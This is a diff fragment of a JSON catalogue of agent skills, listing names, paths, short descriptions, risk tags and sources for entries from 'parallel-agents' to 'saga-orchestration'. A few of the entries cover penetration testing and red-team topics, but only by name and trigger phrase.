+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "parallel-agents",
+ "path": "skills/parallel-agents",
+ "category": "uncategorized",
+ "name": "parallel-agents",
+ "description": "Multi-agent orchestration patterns. Use when multiple independent tasks can run with different domain expertise or when comprehensive analysis requires multiple perspectives.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "payment-integration",
+ "path": "skills/payment-integration",
+ "category": "uncategorized",
+ "name": "payment-integration",
+ "description": "Integrate Stripe, PayPal, and payment processors. Handles checkout flows, subscriptions, webhooks, and PCI compliance. Use PROACTIVELY when implementing payments, billing, or subscription features.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "paypal-integration",
+ "path": "skills/paypal-integration",
+ "category": "uncategorized",
+ "name": "paypal-integration",
+ "description": "Integrate PayPal payment processing with support for express checkout, subscriptions, and refund management. Use when implementing PayPal payments, processing online transactions, or building e-com...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "paywall-upgrade-cro",
+ "path": "skills/paywall-upgrade-cro",
+ "category": "uncategorized",
+ "name": "paywall-upgrade-cro",
+ "description": "When the user wants to create or optimize in-app paywalls, upgrade screens, upsell modals, or feature gates. Also use when the user mentions \"paywall,\" \"upgrade screen,\" \"upgrade modal,...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pc-games",
+ "path": "skills/game-development/pc-games",
+ "category": "game-development",
+ "name": "pc-games",
+ "description": "PC and console game development principles. Engine selection, platform features, optimization strategies.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pci-compliance",
+ "path": "skills/pci-compliance",
+ "category": "uncategorized",
+ "name": "pci-compliance",
+ "description": "Implement PCI DSS compliance requirements for secure handling of payment card data and payment systems. Use when securing payment processing, achieving PCI compliance, or implementing payment card ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pdf-official",
+ "path": "skills/pdf-official",
+ "category": "uncategorized",
+ "name": "pdf-official",
+ "description": "Comprehensive PDF manipulation toolkit for extracting text and tables, creating new PDFs, merging/splitting documents, and handling forms. When Claude needs to fill in a PDF form or programmaticall...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pentest-checklist",
+ "path": "skills/pentest-checklist",
+ "category": "uncategorized",
+ "name": "pentest-checklist",
+ "description": "This skill should be used when the user asks to \"plan a penetration test\", \"create a security assessment checklist\", \"prepare for penetration testing\", \"define pentest scope\", \"foll...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pentest-commands",
+ "path": "skills/pentest-commands",
+ "category": "uncategorized",
+ "name": "pentest-commands",
+ "description": "This skill should be used when the user asks to \"run pentest commands\", \"scan with nmap\", \"use metasploit exploits\", \"crack passwords with hydra or john\", \"scan web vulnerabilities ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "performance-engineer",
+ "path": "skills/performance-engineer",
+ "category": "uncategorized",
+ "name": "performance-engineer",
+ "description": "Expert performance engineer specializing in modern observability,",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "performance-profiling",
+ "path": "skills/performance-profiling",
+ "category": "uncategorized",
+ "name": "performance-profiling",
+ "description": "Performance profiling principles. Measurement, analysis, and optimization techniques.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "performance-testing-review-ai-review",
+ "path": "skills/performance-testing-review-ai-review",
+ "category": "uncategorized",
+ "name": "performance-testing-review-ai-review",
+ "description": "You are an expert AI-powered code review specialist combining automated static analysis, intelligent pattern recognition, and modern DevOps practices. Leverage AI tools (GitHub Copilot, Qodo, GPT-5, C",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "performance-testing-review-multi-agent-review",
+ "path": "skills/performance-testing-review-multi-agent-review",
+ "category": "uncategorized",
+ "name": "performance-testing-review-multi-agent-review",
+ "description": "Use when working with performance testing review multi agent review",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "personal-tool-builder",
+ "path": "skills/personal-tool-builder",
+ "category": "uncategorized",
+ "name": "personal-tool-builder",
+ "description": "Expert in building custom tools that solve your own problems first. The best products often start as personal tools - scratch your own itch, build for yourself, then discover others have the same i...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "php-pro",
+ "path": "skills/php-pro",
+ "category": "uncategorized",
+ "name": "php-pro",
+ "description": "Write idiomatic PHP code with generators, iterators, SPL data\nstructures, and modern OOP features. Use PROACTIVELY for high-performance PHP\napplications.\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pipedrive-automation",
+ "path": "skills/pipedrive-automation",
+ "category": "uncategorized",
+ "name": "pipedrive-automation",
+ "description": "Automate Pipedrive CRM operations including deals, contacts, organizations, activities, notes, and pipeline management via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "plaid-fintech",
+ "path": "skills/plaid-fintech",
+ "category": "uncategorized",
+ "name": "plaid-fintech",
+ "description": "Expert patterns for Plaid API integration including Link token flows, transactions sync, identity verification, Auth for ACH, balance checks, webhook handling, and fintech compliance best practices...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "plan-writing",
+ "path": "skills/plan-writing",
+ "category": "uncategorized",
+ "name": "plan-writing",
+ "description": "Structured task planning with clear breakdowns, dependencies, and verification criteria. Use when implementing features, refactoring, or any multi-step work.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "planning-with-files",
+ "path": "skills/planning-with-files",
+ "category": "uncategorized",
+ "name": "planning-with-files",
+ "description": "Implements Manus-style file-based planning for complex tasks. Creates task_plan.md, findings.md, and progress.md. Use when starting complex multi-step tasks, research projects, or any task requirin...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "playwright-skill",
+ "path": "skills/playwright-skill",
+ "category": "uncategorized",
+ "name": "playwright-skill",
+ "description": "Complete browser automation with Playwright. Auto-detects dev servers, writes clean test scripts to /tmp. Test pages, fill forms, take screenshots, check responsive design, validate UX, test login ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "podcast-generation",
+ "path": "skills/podcast-generation",
+ "category": "uncategorized",
+ "name": "podcast-generation",
+ "description": "Generate AI-powered podcast-style audio narratives using Azure OpenAI's GPT Realtime Mini model via WebSocket. Use when building text-to-speech features, audio narrative generation, podcast creatio...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "popup-cro",
+ "path": "skills/popup-cro",
+ "category": "uncategorized",
+ "name": "popup-cro",
+ "description": "Create and optimize popups, modals, overlays, slide-ins, and banners to increase conversions without harming user experience or brand trust.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "posix-shell-pro",
+ "path": "skills/posix-shell-pro",
+ "category": "uncategorized",
+ "name": "posix-shell-pro",
+ "description": "Expert in strict POSIX sh scripting for maximum portability across Unix-like systems. Specializes in shell scripts that run on any POSIX-compliant shell (dash, ash, sh, bash --posix).",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "postgres-best-practices",
+ "path": "skills/postgres-best-practices",
+ "category": "uncategorized",
+ "name": "postgres-best-practices",
+ "description": "Postgres performance optimization and best practices from Supabase. Use this skill when writing, reviewing, or optimizing Postgres queries, schema designs, or database configurations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "postgresql",
+ "path": "skills/postgresql",
+ "category": "uncategorized",
+ "name": "postgresql",
+ "description": "Design a PostgreSQL-specific schema. Covers best-practices, data types, indexing, constraints, performance patterns, and advanced features",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "postgresql-optimization",
+ "path": "skills/postgresql-optimization",
+ "category": "granular-workflow-bundle",
+ "name": "postgresql-optimization",
+ "description": "PostgreSQL database optimization workflow for query tuning, indexing strategies, performance analysis, and production database management.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "posthog-automation",
+ "path": "skills/posthog-automation",
+ "category": "uncategorized",
+ "name": "posthog-automation",
+ "description": "Automate PostHog tasks via Rube MCP (Composio): events, feature flags, projects, user profiles, annotations. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "postmark-automation",
+ "path": "skills/postmark-automation",
+ "category": "uncategorized",
+ "name": "postmark-automation",
+ "description": "Automate Postmark email delivery tasks via Rube MCP (Composio): send templated emails, manage templates, monitor delivery stats and bounces. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "postmortem-writing",
+ "path": "skills/postmortem-writing",
+ "category": "uncategorized",
+ "name": "postmortem-writing",
+ "description": "Write effective blameless postmortems with root cause analysis, timelines, and action items. Use when conducting incident reviews, writing postmortem documents, or improving incident response proce...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "powershell-windows",
+ "path": "skills/powershell-windows",
+ "category": "uncategorized",
+ "name": "powershell-windows",
+ "description": "PowerShell Windows patterns. Critical pitfalls, operator syntax, error handling.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pptx-official",
+ "path": "skills/pptx-official",
+ "category": "uncategorized",
+ "name": "pptx-official",
+ "description": "Presentation creation, editing, and analysis. When Claude needs to work with presentations (.pptx files) for: (1) Creating new presentations, (2) Modifying or editing content, (3) Working with layo...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pricing-strategy",
+ "path": "skills/pricing-strategy",
+ "category": "uncategorized",
+ "name": "pricing-strategy",
+ "description": "Design pricing, packaging, and monetization strategies based on value, customer willingness to pay, and growth objectives.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "prisma-expert",
+ "path": "skills/prisma-expert",
+ "category": "uncategorized",
+ "name": "prisma-expert",
+ "description": "Prisma ORM expert for schema design, migrations, query optimization, relations modeling, and database operations. Use PROACTIVELY for Prisma schema issues, migration problems, query performance, re...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "privilege-escalation-methods",
+ "path": "skills/privilege-escalation-methods",
+ "category": "uncategorized",
+ "name": "privilege-escalation-methods",
+ "description": "This skill should be used when the user asks to \"escalate privileges\", \"get root access\", \"become administrator\", \"privesc techniques\", \"abuse sudo\", \"exploit SUID binaries\", \"K...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "product-manager-toolkit",
+ "path": "skills/product-manager-toolkit",
+ "category": "uncategorized",
+ "name": "product-manager-toolkit",
+ "description": "Comprehensive toolkit for product managers including RICE prioritization, customer interview analysis, PRD templates, discovery frameworks, and go-to-market strategies. Use for feature prioritizati...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "production-code-audit",
+ "path": "skills/production-code-audit",
+ "category": "uncategorized",
+ "name": "production-code-audit",
+ "description": "Autonomously deep-scan entire codebase line-by-line, understand architecture and patterns, then systematically transform it to production-grade, corporate-level professional quality with optimizations",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "production-scheduling",
+ "path": "skills/production-scheduling",
+ "category": "uncategorized",
+ "name": "production-scheduling",
+ "description": "Codified expertise for production scheduling, job sequencing, line balancing, changeover optimisation, and bottleneck resolution in discrete and batch manufacturing.",
+ "risk": "safe",
+ "source": "https://github.com/ai-evos/agent-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "programmatic-seo",
+ "path": "skills/programmatic-seo",
+ "category": "uncategorized",
+ "name": "programmatic-seo",
+ "description": "Design and evaluate programmatic SEO strategies for creating SEO-driven pages at scale using templates and structured data.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "projection-patterns",
+ "path": "skills/projection-patterns",
+ "category": "uncategorized",
+ "name": "projection-patterns",
+ "description": "Build read models and projections from event streams. Use when implementing CQRS read sides, building materialized views, or optimizing query performance in event-sourced systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "prometheus-configuration",
+ "path": "skills/prometheus-configuration",
+ "category": "uncategorized",
+ "name": "prometheus-configuration",
+ "description": "Set up Prometheus for comprehensive metric collection, storage, and monitoring of infrastructure and applications. Use when implementing metrics collection, setting up monitoring infrastructure, or...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "prompt-caching",
+ "path": "skills/prompt-caching",
+ "category": "uncategorized",
+ "name": "prompt-caching",
+ "description": "Caching strategies for LLM prompts including Anthropic prompt caching, response caching, and CAG (Cache Augmented Generation) Use when: prompt caching, cache prompt, response cache, cag, cache augm...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "prompt-engineer",
+ "path": "skills/prompt-engineer",
+ "category": "automation",
+ "name": "prompt-engineer",
+ "description": "Transforms user prompts into optimized prompts using frameworks (RTF, RISEN, Chain of Thought, RODES, Chain of Density, RACE, RISE, STAR, SOAP, CLEAR, GROW)",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "prompt-engineering",
+ "path": "skills/prompt-engineering",
+ "category": "uncategorized",
+ "name": "prompt-engineering",
+ "description": "Expert guide on prompt engineering patterns, best practices, and optimization techniques. Use when user wants to improve prompts, learn prompting strategies, or debug agent behavior.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "prompt-engineering-patterns",
+ "path": "skills/prompt-engineering-patterns",
+ "category": "uncategorized",
+ "name": "prompt-engineering-patterns",
+ "description": "Master advanced prompt engineering techniques to maximize LLM performance, reliability, and controllability in production. Use when optimizing prompts, improving LLM outputs, or designing productio...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "prompt-library",
+ "path": "skills/prompt-library",
+ "category": "uncategorized",
+ "name": "prompt-library",
+ "description": "Curated collection of high-quality prompts for various use cases. Includes role-based prompts, task-specific templates, and prompt refinement techniques. Use when user needs prompt templates, role-...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "protocol-reverse-engineering",
+ "path": "skills/protocol-reverse-engineering",
+ "category": "uncategorized",
+ "name": "protocol-reverse-engineering",
+ "description": "Master network protocol reverse engineering including packet analysis, protocol dissection, and custom protocol documentation. Use when analyzing network traffic, understanding proprietary protocol...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pydantic-models-py",
+ "path": "skills/pydantic-models-py",
+ "category": "uncategorized",
+ "name": "pydantic-models-py",
+ "description": "Create Pydantic models following the multi-model pattern with Base, Create, Update, Response, and InDB variants. Use when defining API request/response schemas, database models, or data validation ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "pypict-skill",
+ "path": "skills/pypict-skill",
+ "category": "uncategorized",
+ "name": "pypict-skill",
+ "description": "Pairwise test generation",
+ "risk": "safe",
+ "source": "https://github.com/omkamal/pypict-claude-skill/blob/main/SKILL.md",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "python-development-python-scaffold",
+ "path": "skills/python-development-python-scaffold",
+ "category": "uncategorized",
+ "name": "python-development-python-scaffold",
+ "description": "You are a Python project architecture expert specializing in scaffolding production-ready Python applications. Generate complete project structures with modern tooling (uv, FastAPI, Django), type hint",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "python-fastapi-development",
+ "path": "skills/python-fastapi-development",
+ "category": "granular-workflow-bundle",
+ "name": "python-fastapi-development",
+ "description": "Python FastAPI backend development with async patterns, SQLAlchemy, Pydantic, authentication, and production API patterns.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "python-packaging",
+ "path": "skills/python-packaging",
+ "category": "uncategorized",
+ "name": "python-packaging",
+ "description": "Create distributable Python packages with proper project structure, setup.py/pyproject.toml, and publishing to PyPI. Use when packaging Python libraries, creating CLI tools, or distributing Python ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "python-patterns",
+ "path": "skills/python-patterns",
+ "category": "uncategorized",
+ "name": "python-patterns",
+ "description": "Python development principles and decision-making. Framework selection, async patterns, type hints, project structure. Teaches thinking, not copying.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "python-performance-optimization",
+ "path": "skills/python-performance-optimization",
+ "category": "uncategorized",
+ "name": "python-performance-optimization",
+ "description": "Profile and optimize Python code using cProfile, memory profilers, and performance best practices. Use when debugging slow Python code, optimizing bottlenecks, or improving application performance.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "python-pro",
+ "path": "skills/python-pro",
+ "category": "uncategorized",
+ "name": "python-pro",
+ "description": "Master Python 3.12+ with modern features, async programming, performance optimization, and production-ready practices. Expert in the latest Python ecosystem including uv, ruff, pydantic, and FastAPI.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "python-testing-patterns",
+ "path": "skills/python-testing-patterns",
+ "category": "uncategorized",
+ "name": "python-testing-patterns",
+ "description": "Implement comprehensive testing strategies with pytest, fixtures, mocking, and test-driven development. Use when writing Python tests, setting up test suites, or implementing testing best practices.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "quality-nonconformance",
+ "path": "skills/quality-nonconformance",
+ "category": "uncategorized",
+ "name": "quality-nonconformance",
+ "description": "Codified expertise for quality control, non-conformance investigation, root cause analysis, corrective action, and supplier quality management in regulated manufacturing.",
+ "risk": "safe",
+ "source": "https://github.com/ai-evos/agent-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "quant-analyst",
+ "path": "skills/quant-analyst",
+ "category": "uncategorized",
+ "name": "quant-analyst",
+ "description": "Build financial models, backtest trading strategies, and analyze market data. Implements risk metrics, portfolio optimization, and statistical arbitrage.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "radix-ui-design-system",
+ "path": "skills/radix-ui-design-system",
+ "category": "uncategorized",
+ "name": "radix-ui-design-system",
+ "description": "Build accessible design systems with Radix UI primitives. Headless component customization, theming strategies, and compound component patterns for production-grade UI libraries.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "rag-engineer",
+ "path": "skills/rag-engineer",
+ "category": "uncategorized",
+ "name": "rag-engineer",
+ "description": "Expert in building Retrieval-Augmented Generation systems. Masters embedding models, vector databases, chunking strategies, and retrieval optimization for LLM applications. Use when: building RAG, ...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "rag-implementation",
+ "path": "skills/rag-implementation",
+ "category": "granular-workflow-bundle",
+ "name": "rag-implementation",
+ "description": "RAG (Retrieval-Augmented Generation) implementation workflow covering embedding selection, vector database setup, chunking strategies, and retrieval optimization.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "react-best-practices",
+ "path": "skills/react-best-practices",
+ "category": "uncategorized",
+ "name": "react-best-practices",
+ "description": "React and Next.js performance optimization guidelines from Vercel Engineering. This skill should be used when writing, reviewing, or refactoring React/Next.js code to ensure optimal performance pat...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "react-flow-architect",
+ "path": "skills/react-flow-architect",
+ "category": "uncategorized",
+ "name": "react-flow-architect",
+ "description": "Expert ReactFlow architect for building interactive graph applications with hierarchical node-edge systems, performance optimization, and auto-layout integration. Use when Claude needs to create or...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "react-flow-node-ts",
+ "path": "skills/react-flow-node-ts",
+ "category": "uncategorized",
+ "name": "react-flow-node-ts",
+ "description": "Create React Flow node components with TypeScript types, handles, and Zustand integration. Use when building custom nodes for React Flow canvas, creating visual workflow editors, or implementing no...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "react-modernization",
+ "path": "skills/react-modernization",
+ "category": "uncategorized",
+ "name": "react-modernization",
+ "description": "Upgrade React applications to latest versions, migrate from class components to hooks, and adopt concurrent features. Use when modernizing React codebases, migrating to React Hooks, or upgrading to...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "react-native-architecture",
+ "path": "skills/react-native-architecture",
+ "category": "uncategorized",
+ "name": "react-native-architecture",
+ "description": "Build production React Native apps with Expo, navigation, native modules, offline sync, and cross-platform patterns. Use when developing mobile apps, implementing native integrations, or architecti...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "react-nextjs-development",
+ "path": "skills/react-nextjs-development",
+ "category": "granular-workflow-bundle",
+ "name": "react-nextjs-development",
+ "description": "React and Next.js 14+ application development with App Router, Server Components, TypeScript, Tailwind CSS, and modern frontend patterns.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "react-patterns",
+ "path": "skills/react-patterns",
+ "category": "uncategorized",
+ "name": "react-patterns",
+ "description": "Modern React patterns and principles. Hooks, composition, performance, TypeScript best practices.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "react-state-management",
+ "path": "skills/react-state-management",
+ "category": "uncategorized",
+ "name": "react-state-management",
+ "description": "Master modern React state management with Redux Toolkit, Zustand, Jotai, and React Query. Use when setting up global state, managing server state, or choosing between state management solutions.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "react-ui-patterns",
+ "path": "skills/react-ui-patterns",
+ "category": "uncategorized",
+ "name": "react-ui-patterns",
+ "description": "Modern React UI patterns for loading states, error handling, and data fetching. Use when building UI components, handling async data, or managing UI states.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "readme",
+ "path": "skills/readme",
+ "category": "uncategorized",
+ "name": "readme",
+ "description": "When the user wants to create or update a README.md file for a project. Also use when the user says 'write readme,' 'create readme,' 'document this project,' 'project documentation,' or asks for he...",
+ "risk": "safe",
+ "source": "https://github.com/Shpigford/skills/tree/main/readme",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "receiving-code-review",
+ "path": "skills/receiving-code-review",
+ "category": "uncategorized",
+ "name": "receiving-code-review",
+ "description": "Use when receiving code review feedback, before implementing suggestions, especially if feedback seems unclear or technically questionable - requires technical rigor and verification, not performat...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "red-team-tactics",
+ "path": "skills/red-team-tactics",
+ "category": "uncategorized",
+ "name": "red-team-tactics",
+ "description": "Red team tactics principles based on MITRE ATT&CK. Attack phases, detection evasion, reporting.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "red-team-tools",
+ "path": "skills/red-team-tools",
+ "category": "uncategorized",
+ "name": "red-team-tools",
+ "description": "This skill should be used when the user asks to \"follow red team methodology\", \"perform bug bounty hunting\", \"automate reconnaissance\", \"hunt for XSS vulnerabilities\", \"enumerate su...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "reddit-automation",
+ "path": "skills/reddit-automation",
+ "category": "uncategorized",
+ "name": "reddit-automation",
+ "description": "Automate Reddit tasks via Rube MCP (Composio): search subreddits, create posts, manage comments, and browse top content. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "reference-builder",
+ "path": "skills/reference-builder",
+ "category": "uncategorized",
+ "name": "reference-builder",
+ "description": "Creates exhaustive technical references and API documentation. Generates comprehensive parameter listings, configuration guides, and searchable reference materials.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "referral-program",
+ "path": "skills/referral-program",
+ "category": "uncategorized",
+ "name": "referral-program",
+ "description": "When the user wants to create, optimize, or analyze a referral program, affiliate program, or word-of-mouth strategy. Also use when the user mentions 'referral,' 'affiliate,' 'ambassador,' 'word of...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "remotion-best-practices",
+ "path": "skills/remotion-best-practices",
+ "category": "uncategorized",
+ "name": "remotion-best-practices",
+ "description": "Best practices for Remotion - Video creation in React",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "render-automation",
+ "path": "skills/render-automation",
+ "category": "uncategorized",
+ "name": "render-automation",
+ "description": "Automate Render tasks via Rube MCP (Composio): services, deployments, projects. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "requesting-code-review",
+ "path": "skills/requesting-code-review",
+ "category": "uncategorized",
+ "name": "requesting-code-review",
+ "description": "Use when completing tasks, implementing major features, or before merging to verify work meets requirements",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "research-engineer",
+ "path": "skills/research-engineer",
+ "category": "uncategorized",
+ "name": "research-engineer",
+ "description": "An uncompromising Academic Research Engineer. Operates with absolute scientific rigor, objective criticism, and zero flair. Focuses on theoretical correctness, formal verification, and optimal impl...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "returns-reverse-logistics",
+ "path": "skills/returns-reverse-logistics",
+ "category": "uncategorized",
+ "name": "returns-reverse-logistics",
+ "description": "Codified expertise for returns authorisation, receipt and inspection, disposition decisions, refund processing, fraud detection, and warranty claims management.",
+ "risk": "safe",
+ "source": "https://github.com/ai-evos/agent-skills",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "reverse-engineer",
+ "path": "skills/reverse-engineer",
+ "category": "uncategorized",
+ "name": "reverse-engineer",
+ "description": "Expert reverse engineer specializing in binary analysis, disassembly, decompilation, and software analysis. Masters IDA Pro, Ghidra, radare2, x64dbg, and modern RE toolchains.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "risk-manager",
+ "path": "skills/risk-manager",
+ "category": "uncategorized",
+ "name": "risk-manager",
+ "description": "Monitor portfolio risk, R-multiples, and position limits. Creates hedging strategies, calculates expectancy, and implements stop-losses.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "risk-metrics-calculation",
+ "path": "skills/risk-metrics-calculation",
+ "category": "uncategorized",
+ "name": "risk-metrics-calculation",
+ "description": "Calculate portfolio risk metrics including VaR, CVaR, Sharpe, Sortino, and drawdown analysis. Use when measuring portfolio risk, implementing risk limits, or building risk monitoring systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ruby-pro",
+ "path": "skills/ruby-pro",
+ "category": "uncategorized",
+ "name": "ruby-pro",
+ "description": "Write idiomatic Ruby code with metaprogramming, Rails patterns, and performance optimization. Specializes in Ruby on Rails, gem development, and testing frameworks.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "rust-async-patterns",
+ "path": "skills/rust-async-patterns",
+ "category": "uncategorized",
+ "name": "rust-async-patterns",
+ "description": "Master Rust async programming with Tokio, async traits, error handling, and concurrent patterns. Use when building async Rust applications, implementing concurrent systems, or debugging async code.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "rust-pro",
+ "path": "skills/rust-pro",
+ "category": "uncategorized",
+ "name": "rust-pro",
+ "description": "Master Rust 1.75+ with modern async patterns, advanced type system features, and production-ready systems programming.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "saga-orchestration",
+ "path": "skills/saga-orchestration",
+ "category": "uncategorized",
+ "name": "saga-orchestration",
+ "description": "Implement saga patterns for distributed transactions and cross-aggregate workflows. Use when coordinating multi-step business processes, handling compensating transactions, or managing long-running...",
+ "risk": "unknown",
+ "source": "community",
